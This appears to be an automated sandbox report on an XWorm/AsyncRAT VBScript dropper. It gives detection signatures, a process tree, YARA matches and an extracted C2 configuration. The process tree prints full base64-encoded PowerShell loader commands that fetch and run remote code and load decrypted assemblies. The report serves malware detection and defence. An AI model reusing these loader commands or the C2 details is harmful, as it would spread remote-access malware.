
Windows Analysis Report
Xclient.vbs

Overview

General Information

Sample name: Xclient.vbs
Analysis ID: 1615978
MD5: 37c408a159618ed1ceb1dd3bc6ec4d5f
SHA1: a9e709795198f402248ae5f5ec92e761955ad4e9
SHA256: 07b844c4d1fa8600a4cd089adab45c9718629cf4258eb86acbaecba77cb5a0be
Tags: vbs, user-d1v35h

Detection

AsyncRAT, XWorm
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected XWorm
.NET source code contains a sample name check
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to capture screen (.Net source)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses shutdown.exe to shutdown or reboot the system
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Spawns drivers
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7292 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Xclient.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7348 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7400 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7456 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQk
NzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkcGd2d2wpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRyZmcgaW4gJGNtdGt0KSB7CWlmICgkcmZnLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSR3bHFpcD0kcmZnLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRla2Nmbj1bc3RyaW5nW11dJHdscWlwLlNwbGl0KCdcJyk7SUVYICckanhpY3M9aWxneWUgKGtkYXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGVrY2ZuWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHVncXJqPWlsZ3llIChrZGF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRla2NmblsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt6Z3d3dyAkanhpY3MgJG51bGw7emd3d3cgJHVncXJqICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • shutdown.exe (PID: 3452 cmdline: shutdown.exe -L MD5: F2A4E18DA72BB2C5B21076A5DE382A20)
  • cmd.exe (PID: 7800 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6dd171fd.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7852 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6dd171fd.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cmd.exe (PID: 8156 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0c891e71.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2852 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0c891e71.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3152 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNz
aUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkcGd2d2wpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRyZmcgaW4gJGNtdGt0KSB7CWlmICgkcmZnLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSR3bHFpcD0kcmZnLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRla2Nmbj1bc3RyaW5nW11dJHdscWlwLlNwbGl0KCdcJyk7SUVYICckanhpY3M9aWxneWUgKGtkYXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGVrY2ZuWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHVncXJqPWlsZ3llIChrZGF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRla2NmblsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt6Z3d3dyAkanhpY3MgJG51bGw7emd3d3cgJHVncXJqICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cmd.exe (PID: 5936 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a276d6c0.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7360 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a276d6c0.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7312 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cmd.exe (PID: 5180 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_79ced6d4.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7772 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_79ced6d4.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2720 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • LogonUI.exe (PID: 1740 cmdline: "LogonUI.exe" /flags:0x2 /state0:0xa3f76055 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
    • fontdrvhost.exe (PID: 8044 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • dwm.exe (PID: 1020 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
  • LogonUI.exe (PID: 3716 cmdline: "LogonUI.exe" /flags:0x4 /state0:0xa3f5c055 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
  • svchost.exe (PID: 5368 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cdd.dll (PID: 4 cmdline: MD5: 9B684213A399B4E286982BDAD6CF3D07)
  • fontdrvhost.exe (PID: 6440 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
  • LogonUI.exe (PID: 6500 cmdline: "LogonUI.exe" /flags:0x2 /state0:0xa3f66055 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
  • cdd.dll (PID: 4 cmdline: MD5: 9B684213A399B4E286982BDAD6CF3D07)
  • cdd.dll (PID: 4 cmdline: MD5: 9B684213A399B4E286982BDAD6CF3D07)
  • LogonUI.exe (PID: 5696 cmdline: "LogonUI.exe" /flags:0x2 /state0:0xa3f7d855 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
  • fontdrvhost.exe (PID: 7612 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
  • cdd.dll (PID: 4 cmdline: MD5: 9B684213A399B4E286982BDAD6CF3D07)
  • LogonUI.exe (PID: 4080 cmdline: "LogonUI.exe" /flags:0x2 /state0:0xa3f05055 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
  • fontdrvhost.exe (PID: 2912 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
  • cdd.dll (PID: 4 cmdline: MD5: 9B684213A399B4E286982BDAD6CF3D07)
  • LogonUI.exe (PID: 6408 cmdline: "LogonUI.exe" /flags:0x2 /state0:0xa3f0c855 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
AsyncRAT | AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool; however, it could also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
XWorm | Malware with a wide range of capabilities ranging from RAT to ransomware. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
{"C2 url": ["185.241.208.215"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source | Rule | Description | Author | Strings
00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | (matched strings below)
  • 0x33264:$s6: VirtualBox
  • 0x3d4b4:$s6: VirtualBox
  • 0x331c2:$s8: Win32_ComputerSystem
  • 0x3d412:$s8: Win32_ComputerSystem
  • 0x33a8e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x3dcde:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x33b2b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x3dd7b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x33c40:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x3de90:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x33900:$cnc4: POST / HTTP/1.1
  • 0x3db50:$cnc4: POST / HTTP/1.1
0000001C.00000002.2323673539.00000206008C2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
0000001C.00000002.2323673539.00000206008C2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |

Source | Rule | Description | Author | Strings
5.2.powershell.exe.1d3133b65d0.8.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security |
5.2.powershell.exe.1d3133b65d0.8.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
5.2.powershell.exe.1d3133b65d0.8.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io | (matched strings below)
  • 0x42ab:$str01: $VB$Local_Port
  • 0x429c:$str02: $VB$Local_Host
  • 0x4580:$str03: get_Jpeg
  • 0x3fdd:$str04: get_ServicePack
  • 0x507c:$str05: Select * from AntivirusProduct
  • 0x527a:$str06: PCRestart
  • 0x528e:$str07: shutdown.exe /f /r /t 0
  • 0x5340:$str08: StopReport
  • 0x5316:$str09: StopDDos
  • 0x540c:$str10: sendPlugin
  • 0x548c:$str11: OfflineKeylogger Not Enabled
  • 0x55e4:$str12: -ExecutionPolicy Bypass -File "
  • 0x570d:$str13: Content-length: 5235
5.2.powershell.exe.1d3133b65d0.8.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | (matched strings below)
  • 0x4f8c:$s6: VirtualBox
  • 0x4eea:$s8: Win32_ComputerSystem
  • 0x57b6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x850c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x5853:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x85c4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
